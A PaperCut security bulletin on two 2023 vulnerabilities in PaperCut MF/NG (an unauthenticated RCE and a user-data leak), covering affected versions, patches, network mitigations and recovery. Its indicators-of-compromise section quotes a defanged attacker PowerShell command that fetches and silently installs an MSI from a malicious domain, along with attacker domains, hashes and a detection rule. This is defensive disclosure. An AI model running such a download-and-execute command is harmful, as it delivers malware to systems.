* Enable Integrated Scanning
* Scan PDF compression
* Quick Scan capture fields
* Scan to automatically create folders
* Scan to email using an address book
* Scan to fax
* Printing for end users
* Troubleshooting
* Installation
* Printer discovery
* Sending the print job
* Releasing the print job
* Queues & drivers
* A super node is offline
* Embedded app not connecting
* Users can’t install the PaperCut Printer app
* Email delivery
* Using Job Trace to troubleshoot
* Using Activity Log to troubleshoot
* Enable/download Deep Logs
* Help resources
* Knowledge base
* Known issues
* Service status
* Release notes
* Terms of Service
* Service Description
* End user license agreement
* Purchasing PaperCut Pocket
* Print Deploy manual
* Print Deploy overview
* Why is Print Deploy awesome?
* Print Deploy / Mobility Print - What product to use when
* How Print Deploy works
* Print environments supported by Print Deploy
* How it works - the basics
* How it works - the geeky version
* Print Deploy licensing
* Set up Print Deploy
* System requirements: Print Deploy & PaperCut NG/MF
* Step 1: Determine your print environment
* Step 2: Add and configure zones in Print Deploy
* Step 3: Import print queues into Print Deploy
* Directly print from workstations to printers
* Classic server-hosted print queues
* Mobility Print queues (Quick)
* Mobility Print queues (Advanced)
* Support IPP(S) Print Servers on Windows computers
* Roll out the Print Deploy client
* Choose your print queue/Print Deploy client installation method
* Manual Installation
* Install the Print Deploy client manually on computers
* Users install the Print Deploy client themselves
* Deploy print queues but not the monitoring tool
* Managed/MDM Installation
* Using Google Workspace
* Using VMWare Workspace ONE
* Using Windows Group Policy
* Using Microsoft Intune (Windows)
* Using Microsoft Intune (macOS)
* Using Jamf
* Using Kandji
* Using another macOS-compatible MDM
* List of installation parameters and filename configurations
* Configure Print Deploy (optional)
* Shared computers (Windows only)
* Configure the client
* Configure the Direct Print Monitor for large sites
* Customize the user login popup branding and text
* Change the client polling time
* Set the method used to determine the user’s identity
* Allow the client to update printers when a network change is
detected
* Using an external PostgreSQL DB
* Configure Print Deploy in Virtual Desktop Infrastructure (VDI)
* Print Deploy VDI client overview
* Citrix
* Azure RDS
* Microsoft RDS
* VMWare Horizon
* VDI FAQs
* Troubleshooting - log analysis
* Enhance Print Deploy security (optional)
* Enhance Print Deploy security with a CA-signed certificate
* Enhance Print Deploy server security with a custom TLS setting
* Enable SSL certificate checking
* Print Deploy antivirus exclusions
* (Advanced) Set up an SSL/TLS certificate for Print Deploy
* (Advanced) Set up an SSL/TLS certificate for Mobility Print
* Troubleshooting
* Troubleshoot the Print Deploy Cloner
* Troubleshoot the Print Deploy Client
* Maintain your print environment
* FAQs
* Release History
* Give feedback on Print Deploy
* Mobility Print manual
* Overview
* Why is Mobility Print awesome?
* The Mobility Story
* Print Deploy / Mobility Print - What product to use when
* Do I need PaperCut NG or MF?
* How it works
* Printer discovery - which method is best for you?
* Print job delivery and examples
* Mobility Print architecture
* Ghost Trap and Ghostscript
* Setting up Mobility Print
* System requirements
* Step 1: Install Mobility Print
* Step 2: Configure Mobility Print
* Select the printers to publish
* Printer discovery using mDNS
* Printer discovery using DNS
* Printer discovery using 'known host'
* Print authentication mode
* Cost allocation
* Advanced configuration
* Change the Mobility Print password
* Configure a server behind a firewall or NAT
* Disabling server auto-updates
* Configure Mobility Print behind a Network Load Balancer
* Restrict printer access per subnet
* Enhance Mobility Print server security with a custom TLS
setting
* Automatically disable new printers
* Implement a Trusted SSL Certificate for the Mobility Print
Administrator Interface
* Manage Single sign on for Chromebooks
* Set up Guest printing for Chromebook users
* Set up Mobility Print with a Site Server
* Step 3: Set up and test client printing
* Step 4: Roll out Mobility Print
* Setting up Cloud Print for Mobility Print
* Overview
* Step 1: Configure Cloud Print
* Step 2: Set up Cloud Print on the clients
* Chromebooks / ChromeOS
* Windows
* Mac / macOS
* Managing Cloud Print
* Cloud Print Security
* Setting up a device (mDNS/DNS)
* Windows
* Mac / macOS
* iPhone / iPad / iOS
* Android
* Chromebook / ChromeOS
* Setting up a device (known host)
* Setting up a device (Cloud Print)
* Troubleshooting
* Printer discovery problems with mDNS
* Printer discovery problems with DNS
* Troubleshooting Cloud Print
* Troubleshooting the Chrome Extension
* Troubleshooting print jobs
* Troubleshooting restricting printer access per subnet
* Mobility Print server not detecting printers
* Authentication
* End user and non-admin help
* FAQs
* Release history
* Job Ticketing manual
* Overview
* Getting Started
* Setup and Configuration
* Installation
* Install the software
* Logging in
* Explore the interfaces
* Configuration
* Manage rooms
* Configure room contact details
* Configure delivery options
* Define the Workflow
* Example customized Workflows
* Customize the Workflow
* Configure email notifications
* Personalize an operator profile
* Using JSON
* Using markdown
* Setting up products
* Job Ticketing scenarios: products
* Configure a product
* Product attribute reference
* Configure costs
* Step 1: Allocate a cost to product and delivery options
* Step 2: Setting up draft products
* Step 3: Create or change a cost script
* About the estimateCost(order) function
* Using functions
* Description functions (conditional statement)
* Cost calculation functions (For Loop)
* Date comparison functions (dateDiff)
* Using variables
* Using Order object attributes
* Using the Cost Script editor
* Using JavaScript
* Example cost scripts
* Step 4: Assign a cost script to each product
* Go live
* Test order submission
* Test order processing
* Publish your products
* Assign access to the Operator interface
* Enable Job Ticketing in the PaperCut MF User interface
* Share Job Ticketing with your customers
* System management
* Configure the maximum uploaded file size
* Configure the file storage location
* Change the currency symbol
* Configure the number of decimal places used for prices
* Enable or disable Gravatar
* Configure PDF page counter mode
* Prevent specific file types from being uploaded
* Configure the server address for links in emails
* Configure the database storage location
* Start and stop the Job Ticketing service
* Define your data backup strategy
* Archiving print job files
* Exporting data
* Troubleshooting
* Managing orders
* Submit an order for a customer
* Process an order
* Change the status of an order
* Send comments to a customer
* Add an internal note to an order
* View notifications
* Download the file to print
* Print a job ticket
* Charge an order to an account
* Cancel an order
* Refund an order
* Order processing examples
* View order details
* View a summary of orders
* Workflow view
* Order List view
* View individual order details
* Manage customer announcements
* Placing an order
* Place a Print Room or FabLab order
* Approve a quote or proof
* Add comments to an order
* View comments from the print room
* Cancel an order
* Release notes
* Video tutorials
* FAQs
* Knowledge base
* KB Home
* FAQs
* How-to-articles
* Reference
* Troubleshooting
* Known Issues
* Sales and Licensing
* End-user articles
* Release notes
* PaperCut MF release notes
* PaperCut NG release notes
* System requirements
* PaperCut NG
* PaperCut MF
* PaperCut Pocket and Hive
* Support
Contents
* Overview
* ZDI-CAN-18987 / PO-1216 / ZDI-23–233
* ZDI-CAN-19226 / PO-1219 / ZDI-23–232
* Product status and next steps
* FAQs
* Acknowledgements
* Security notifications
* Updates
* Home
* ›
* Support
* ›
* Knowledge Base
* ›
* URGENT MF/NG vulnerability bulletin (March 2023) | PaperCut
URGENT MF/NG VULNERABILITY BULLETIN (MARCH 2023) | PAPERCUT
THE PAGE APPLIES TO:
Contents
* Overview
* ZDI-CAN-18987 / PO-1216 / ZDI-23–233
* ZDI-CAN-19226 / PO-1219 / ZDI-23–232
* Product status and next steps
* FAQs
* Acknowledgements
* Security notifications
* Updates
info
This page will continue to be updated as new information becomes available. Last
updated: 16 May 12:00 AEST.
info
For other Security vulnerability and Security bulletin information, see our
Security vulnerability information and common security questions page.
We have received two vulnerability reports from a 3rd party cyber security
company ( Trend Micro ), for high/critical severity security issues in PaperCut
MF/NG. We have evidence to suggest that unpatched servers are being exploited in
the wild.
* Remote Code Execution vulnerability (CVE-2023–27350 / ZDI-CAN-18987 /
ZDI-23–233)
* User account data vulnerability (CVE-2023–27351 / ZDI-CAN-19226 / ZDI-23–232)
Critical
Please note that as of 18th April, 2023 (see “When was the exploit first
detected in the wild?” in the FAQs) we have evidence to suggest that unpatched
servers are being exploited in the wild, (particularly ZDI-CAN-18987 / PO-1216 /
ZDI-23–233).
Our immediate advice is to upgrade your PaperCut Application Servers to one of
the fixed versions listed below if you haven’t already.
If you suspect that your server has been compromised, we recommend taking server
backups, then wiping the Application Server, and rebuilding the Application
Server and restoring the database from a ‘safe’ backup point prior to when you
discovered any suspicious behavior. We have also updated the FAQ “How do I know
if my server has been exploited?” question below.
Important
Both of these vulnerabilities have been fixed in PaperCut MF and PaperCut NG
versions 20.1.7, 21.2.11, and 22.0.9 and later. We highly recommend upgrading to
one of these versions containing the fix (see the Where can I get the upgrade?
question below).
ZDI-CAN-18987 / PO-1216 / ZDI-23–233
(also identified as CVE-2023–27350)
We have confirmed that under certain circumstances this allows for an
unauthenticated attacker to get Remote Code Execution (RCE) on a PaperCut
Application Server. This could be done remotely and without the need to log in.
This vulnerability has been rated with a CVSS score of 9.8.
ZDI-CAN-19226 / PO-1219 / ZDI-23–232
(also identified as CVE-2023–27351)
We have confirmed that under certain circumstances this allows for an
unauthenticated attacker to potentially pull information about a user stored
within PaperCut MF or NG - including usernames, full names, email addresses,
office/department info and any card numbers associated with the user. The
attacker can also retrieve the hashed passwords for internal PaperCut-created
users only (note that this does not include any password hashes for users sync’d
from directory sources such as Microsoft 365 / Google Workspace / Active
Directory and others). This could be done remotely and without the need to log
in. We do not have any evidence of this vulnerability being used against
customers at this point.
This vulnerability has been rated with a CVSS score of 8.2.
PRODUCT STATUS AND NEXT STEPS
Which PaperCut products are impacted, and what are the actions required?
ZDI-CAN-18987 / PO-1216 / ZDI-23–233
CVE-2023–27350ZDI-CAN-19226 / PO-1219 / ZDI-23–232
CVE-2023–27351What versions are impacted / which versions are
VULNERABLE?PaperCut MF or NG version 8.0 or later (excluding patched versions)
on all OS platforms. This includes:
version 8.0.0 to 19.2.7 (inclusive)
version 20.0.0 to 20.1.6 (inclusive)
version 21.0.0 to 21.2.10 (inclusive)
version 22.0.0 to 22.0.8 (inclusive)PaperCut MF or NG version 15.0 or later
(excluding patched versions), on all OS platforms. This includes:
version 15.0.0 to 19.2.7 (inclusive)
version 20.0.0 to 20.1.6 (inclusive)
version 21.0.0 to 21.2.10 (inclusive)
version 22.0.0 to 22.0.8 (inclusive)What versions are not impacted / which
versions are FIXED?version 20.1.7
version 21.2.11
versions 22.0.9 and later
version 20.1.7
version 21.2.11
versions 22.0.9 and laterWhich PaperCut MF or NG components are
impacted?Application Servers are impacted
Site Servers are impactedApplication Servers are impactedWhich PaperCut
components or products are NOT impacted?PaperCut MF/NG secondary servers (Print
Providers).
PaperCut MF/NG Direct Print Monitors (Print Providers).
PaperCut MF MFD Embedded Software.
PaperCut Hive.
PaperCut Pocket.
Print Deploy.
Mobility Print.
PaperCut User Client software.
PaperCut Multiverse.
Print Logger.PaperCut MF/NG secondary servers (Print Providers).
PaperCut MF/NG Direct Print Monitors (Print Providers).
PaperCut MF/NG site servers.
PaperCut MF MFD Embedded Software.
PaperCut Hive.
PaperCut Pocket.
Print Deploy.
Mobility Print.
PaperCut User Client software.
PaperCut Multiverse.
Print Logger.Next stepsWe recommend that you upgrade all Application Servers and
Site Servers (see Upgrade documentation)
You will not need to patch Secondary Servers (Print Providers / Direct Print
Monitors) - but you can if you prefer.We recommend that you upgrade all
Application Servers and Site Servers (see Upgrade documentation). Even though
the Site Server is not impacted by this vulnerability, you will need to upgrade
them to match the version number of the Application Server.
You will not need to patch Secondary Servers (Print Providers / Direct Print
Monitors) - but you can if you prefer.
FAQS
Q Where can I get the upgrade?
Please follow your usual upgrade procedure. Additional links on the ‘Check for
updates’ page (accessed through the Admin interface > About > Version info >
Check for updates) will allow customers to download fixes for previous major
versions which are still supported (e.g. 20.1.7 and 21.2.11) as well as the
current version available.
If you are using PaperCut MF, we highly recommend following your regular upgrade
process. Your PaperCut partner or reseller information can also be found on the
‘About’ tab in the PaperCut admin interface.
Alternatively, get direct downloads from here. It’s easy to identify your
edition of PaperCut - you’ll see it on the About tab or by checking the footer
of your PaperCut admin login.
Q What products are impacted by these vulnerabilities?
See the ‘Which components are impacted’ or ‘Which components are not impacted’
rows in the table above for a detailed list.
Q What is PaperCut doing to assist customers?
PaperCut and its partner network has activated response teams to assist PaperCut
MF and NG customers. Our service desks are manned 24/7 via our support page.
The security response team at PaperCut has been working with external security
advisors to compile a list of unpatched PaperCut MF/NG servers that have ports
open on the public internet. In addition to our email and in-app announcements
to all customers, we’ve been using this list to proactively reach out to
potentially exposed customers via multiple means from Wednesday afternoon (AEST)
and are working 24/7 through the weekend.
Q When was the exploit first detected in the wild?
PaperCut received our first report from a customer of suspicious activity on
their PaperCut server on the 18th April at 03:30 AEST / 17th April 17:30 UTC.
PaperCut has conducted analysis on all customer reports, and the earliest
signature of suspicious activity on a customer server potentially linked to this
vulnerability is 14th April 01:29 AEST / 13th April 15:29 UTC
Q Is there any impact from applying the upgrade?
There should be no negative impact from applying these security fixes. No other
manual steps need to be taken.
Q Where are the release notes for these fixes?
You can see the release notes pages for PaperCut MF and NG which list all fixes
included per version:
* MF - 20.1.7, 21.2.11, 22.0.9
* NG - 20.1.7, 21.2.11, 22.0.9
Q What are the CVSS scores for these vulnerabilities?
Vulnerability: CVE-2023–27350 / ZDI-CAN-18987 / PO-1216 / ZDI-23–233
* Score: 9.8 (Critical)
* Breakdown: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Vulnerability: CVE-2023–27351 / ZDI-CAN-19226 / PO-1219 / ZDI-23–232
* Score: 8.2 (High)
* Breakdown: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N
Q Do the current releases cover the new exploit method from VulnCheck and
mentioned in the Bleeping Computer article, 6 May?
Yes, the New PaperCut RCE exploit created that bypasses existing detections
article is referring to exploiting the same vulnerability, in a way that the
activity is not easily detected in the Sysmon or PaperCut MF application log.
The method of exploiting PaperCut MF mentioned in the article is mitigated in
versions 20.1.7, 21.2.11, and 22.0.9 and later.
Q Is there more information available about these vulnerabilities?
Not at this time - to give customers a chance to upgrade, we are not releasing
further details about these vulnerabilities.
Trend Micro have also advised they will disclose further information (TBD) about
the vulnerability on 10th May 2023. For more information, see
https://www.zerodayinitiative.com/advisories/upcoming/ (filter on “PaperCut”).
CISA have published an Advisory with additional information on 11th May 2023.
Q If we can’t upgrade to security patch, what other options are there?
Particularly if you have an older application version that doesn’t have a minor
patch available, we highly recommend locking down network access to the
server(s).
* Block all inbound traffic from external IPs to the web management port (port
9191 and 9192 by default)
* Block all traffic inbound to the web management portal on the firewall to the
server. Note: this will prevent lateral movement from internal hosts but
management of the PaperCut service can only be performed on that asset.
* Apply “Allow list” restrictions under Options > Advanced > Security > Allowed
site server IP addresses. Set this to only allow the IP addresses of verified
Site Servers on your network. Note this only addresses ZDI-CAN-19226 /
PO-1219
Q How do I know if my server has been exploited?
We currently recommend looking for the following Indicators of Compromise (IOCs)
to determine if it is likely that the vulnerability has been used to install
malware on the system. Depending on your systems, logging and endpoint
protection software you may be able to detect the following.
* If you see suspicious activity or security alerts in Antivirus, anti-malware
and endpoint security software tooling.
* If you see suspicious PaperCut MF application log entries, ie:
* User “admin” logs into the administration interface
* Admin user “admin” modified the print script on the printer
* User “admin” updated the config key “…” (where the config key is not one
you’ve deliberately changed)
* User “[setup-wizard]” modified a config key
* If your Application Server server logs happen to be in debug mode, check to
see if there are lines mentioning SetupCompleted at a time not correlating
with the server installation or upgrade. Server logs can be found e.g. in
[app-path]/server/logs/*.* where server.log is normally the most recent log
file.
* Domains in DNS or web proxy logs:
* upd488[.]windowservicecemter[.]com/download/ld.txt
* upd488[.]windowservicecemter[.]com/download/AppPrint.msi
* upd488[.]windowservicecemter[.]com/download/a2.msi
* upd488[.]windowservicecemter[.]com/download/a3.msi
* anydeskupdate[.]com
* anydeskupdates[.]com
* netviewremote[.]com
* updateservicecenter[.]com
* windowcsupdates[.]com
* windowservicecentar[.]com
* windowservicecenter[.]com
* winserverupdates[.]com
* study[.]abroad[.]ge
* ber6vjyb[.]com
* 5[.]188[.]206[.]14
* upd488[.]windowservicecemter[.]com/download/update.dll
* New suspicious entries in SSH authorized keyfile.
* New print scripts in the setup. Review the ‘Scripting’ configuration of each
printer (and device) in PaperCut MF/NG admin.
* SHA256 hashes of files on local system:
* setup.msi f9947c5763542b3119788923977153ff8ca807a2e535e6ab28fc42641983aabb
* ld.txt c0f8aeeb2d11c6e751ee87c40ee609aceb1c1036706a5af0d3d78738b6cc4125
* Powershell Scripts having similar content to:
```
cmd /c “powershell.exe -nop -w hidden
Invoke-WebRequest ‘hXXp://upd488[.]windowservicecemter[.]com/download/setup.msi’
-OutFile ‘setup.msi’ ”
cmd /c “msiexec /i setup.msi /qn IntegratorLogin=fimaribahundqf[AT]gmx[.]com CompanyId=1”\@@
```
* Detection via YARA Rule on SIEM:
```
title: PaperCut MF/NG Vulnerability
authors: Huntress DE&TH Team
description: Detects suspicious code execution from vulnerable PaperCut versions MF and NG
logsource:
category: process_creation
product: windows
detection:
selection:
ParentImage|endswith: “\\pc-app.exe”
Image|endswith:
- “\\cmd.exe”
- “\\powershell.exe”
condition: selection
level: high
falsepositives:
- Expected admin activity
```
Additional context on the IoC may also be found in the CISA Advisory.
If you suspect that your server has been compromised, we recommend taking server
backups, then wiping the Application Server, and rebuilding the Application
Server and restoring the database from a ‘safe’ backup point prior to when you
discovered any suspicious behavior. In addition we recommend you implement your
security response procedures and carry out best practices around potential
compromise. Also see the “How do I retain my data when restoring my Application
Server?” question below.
We will update this question with more details as we find more information from
our customer base and security community.
Q How do I retain my data when restoring my Application Server?
Depending on how far back you need to restore your backup from, you may want to
restore balances or other data changes in the gap between the last safe backup,
and now.
There’s some options for the restore process and subsequent data retention
below:
1. Restore App Server and Database to a clean backup (Recommended option)
* This would involve restoring the Application Server and database from a
‘safe’ backup point prior to when you discovered any suspicious behavior.
* If you don’t require the data changes between the safe backup and now,
you’re all set.
2. Restore App Server and Database, then update user balances (Safe option)
* To restore recent user balances, we recommend restoring the latest
(current) database backup containing all of the latest data, onto a
staging machine that’s running a patched version of the Application
Server, and is not connected to the network. You can then use this
environment to export your user balances, and then import them into the
production (restored) system.
* To export user balance / user credit data from your off-network system,
run a user report - e.g. in the PaperCut MF/NG admin interface, head to
Reports > User > User reports > User list then select the CSV report
format. This will generate a list of your users and their current
balances.
* Then use the detailed information on the Batch import and update user data
article to format the data into the correct columns, then import/update
the data in your production system.
3. Restore App Server, and retain your most recent database
* If you need to keep all your reporting data as well as user balance data
and other changes to the database, you will need to manually clean a copy
of your potentially compromised database.
* We recommend restoring the latest (current) database backup containing all
of the latest data, onto a staging machine that’s running a patched
version of the Application Server, and is not connected to the network.
* On that system, ensure that you clean/check the following:
* Set config key print-and-device.script.enabled is set to N (if you’re
not using print or device scripting)
* Set config key device.script.sandboxed is set to Y (the recommended
default)
* Set config key print.script.sandboxed is set to Y (the recommended
default)
* Delete any device scripts or print scripts which have been configured,
in case they have been tampered with.
* Ensure that your user lists and other PaperCut MF/NG settings match with
what you expect to see in your environment.
* Once you are confident that the staging machine settings are clean,
perform a database export from the staging environment, then import that
cleaned database data into the production environment.
Q Is there a maintenance release for versions 19 or older?
No - versions 19 and older are now “end of life”, as documented on our End of
Life Policy page.
We recommend purchasing an updated license, which you can do online if you’re
using PaperCut NG, or through your PaperCut Partner if you’re using PaperCut MF.
You can find your PaperCut Partner contact information through the ‘About’ or
‘Help’ tab in the PaperCut administration interface.
Q I have a version 20 license, but no current M&S (maintenance and support) -
can I still get this fix?
Yes! As long as you are running a version which is currently supported (version
20 or later) you can upgrade to whichever maintenance release version you’re
licensed for. For example if you are licensed for version 20 but you don’t have
a valid license for version 21, you can update to version 20.1.7 as above. See
the ‘Where can I get the upgrade?’ question above for more details.
See our Upgrade Policy page for more information on licensing and upgrades.
ACKNOWLEDGEMENTS
PaperCut would like to thank the team at Trend Micro Zero Day Initiative for
reporting these issues and working with us to help protect our customers:
* ZDI-CAN-19226 - Discovered by: Piotr Bazydlo (@chudypb) of Trend Micro Zero
Day Initiative
* ZDI-CAN-18987 - Discovered by: Anonymous
PaperCut would also like to thank:
* “Huntress” team members Joe Slowik, Caleb Stewart, Stuart Ashenbrenner, John
Hammond, Jason Phelps, Sharon Martin, Kris Luzadre, Matt Anderson and Dave
Kleinatland.
Trend Micro have also advised they will disclose further information (TBD) about
the vulnerability on 10th May 2023. For more information, see
https://www.zerodayinitiative.com/advisories/published/ (filter on “PaperCut”).
PaperCut Software would like to acknowledge and thank CISA for their Advisory
published on 11th May 2023.
SECURITY NOTIFICATIONS
“How do I sign-up for paperCut’s security mailing list?”
In order to get timely notifications of security news (including security
related fixes or vulnerability information) please subscribe to our security
notifications list via our Security notifications sign-up form. If you’re a sys
admin or if you look after PaperCut product implementations at your
organization, this list will help you be amongst the first to hear of any
security related news or updates.
UPDATES
DateUpdate/Action10th January 2023 (AEDT)Vulnerability reported to PaperCut, by
Trend Micro (see ZDI-CAN-18987 and ZDI-CAN-19226).8th March 2023 (AEDT)Released
PaperCut MF and NG versions 20.1.7, 21.2.11 and 22.0.9 containing a fix for
these vulnerabilities.
Published this KB article documenting the vulnerability information.
Sent communications to PaperCut partners and PaperCut security notifications
email list.14th March 2023 (AEDT)Trend Micro published additional details of the
vulnerability on their website: ZDI-CAN-18987 and ZDI-CAN-19226.19th April 2023
(AEST)Updated this KB with new information discovered on the 18th April -
indicating evidence to suggest that unpatched servers are being exploited in the
wild.20th April 2023 (AEST)Published RCE security exploit in PaperCut servers
blog post.21st April 2023 (AEST)Added “If we can’t upgrade to security patch,
what other options are there?” (replaced the old “Is there a mitigation for
these vulnerabilities if I don’t want to upgrade?”)
Updated Acknowledgements section
Updated “How do I know if my server has been exploited?”22nd April 2023
(AEST)Added new FAQ explaining what PaperCut has been doing to proactively
support PaperCut MF and NG customers.
Added new FAQ “When was the exploit first detected in the wild?”23rd April 2023
(AEST)No new updates - continuing to proactively reach out to customers with
internet-facing servers.24th April 2023 (AEST)Added direct download links to
‘Where can I get the upgrade’25th April 2023 (AEST)Clarified that Multiverse and
Print Logger are NOT impacted27th April 2023 (AEST)Minor clarifications to ‘not
impacted’ section. Also listed each impacted or not-impacted version range
explicitly28th April 2023 (AEST)Minor updates to ensure the CVE numbers are
listed higher on the page.
Added reminder of the importance of implementing security response procedures if
there has been a suspected compromise.
Added latest findings on indicators of compromise.30th April 2023 (AEST)No
bulletin updates today. Reminder that the PaperCut support teams are on hand to
assist customers with upgrading or mitigations if required.2nd May 2023
(AEST)Added 22.0.11 to the ‘fixed’ list, following today’s release.
Added the “How do I retain my data when restoring my Application Server?”
question.4th May 2023 (AEST)Included the updated non-candidate ZDI reference
numbers from Trend Micro (ZDI-23–233 and ZDI-23–232).5th May 2023 (AEST)Included
a mention of Trinity Cyber, working with Trend Micro.9th May 2023 (AEST)Included
a mention of Bleeping Computer article mentioning VulnCheck.11th May 2023
(AEST)Reverted mention of Trinity Cyber, working with Trend Micro.12th May 2023
(AEST)Added links to CISA Advisory.16th May 2023 (AEST)Added “22.0.9 and later”
to fixed-versions list, since 22.0.12 is now out too.
--------------------------------------------------------------------------------
Categories: FAQ , Security and Privacy
--------------------------------------------------------------------------------
Keywords:
COMMENTS
Please enable JavaScript to view the comments powered by Disqus.
Last updated June 13, 2024
Subscribe to PaperCut communications
braze_id
braze_device_id
* Yes, subscribe me to PaperCut news, offers, product updates, newsletters and
events.
*
By filling out and submitting this form, you agree that you have read our
Privacy Policy, and agree to PaperCut handling your data in accordance with its
terms.
This site is protected by reCAPTCHA and the Google Privacy Policy and Terms of
Service apply.
Products
* Product Overview
* PaperCut NG
* PaperCut MF
* PaperCut Pocket
* PaperCut Hive
* Product comparison
Free Tools
* PaperCut Mobility Print
* PaperCut QRDoc
* PaperCut Views
Beta
* In the Percolator
Solutions for Industries
* High school/K-12
* Higher education
* Healthcare
* Coworking
* Life sciences
* Legal
* Small businesses
* Large enterprise
* Local government
What our customers say
* Customer Stories
* Testimonials
Discover
* Discover overview
* Easy printing
* Print security
* Cloud and Print
* Waste control
* Scanning
* Integrations
* Products at a Glance
* Best practices
* Forest Positive
Have a Read
* Blog
* Resources
Support
* Support Overview
Get PaperCut
* Contact Sales
About
* About us
* Careers
Misc
* Become a Reseller
* Privacy Policy
* Cookie Settings
Hey there! We use cookies. Why? They let us personalize content, track
usage, and analyze data on our end to improve your experience. To learn more
about the different cookies we’re using, check out our Privacy Policy.
OK, I understand
PaperCut, the P symbol, and PaperCut products are trademarks of the PaperCut
group of companies.
© PaperCut Software Pty Ltd
Survey
SHARE YOUR THOUGHTS
How easy was it to find what you were looking for on our website?
Submit now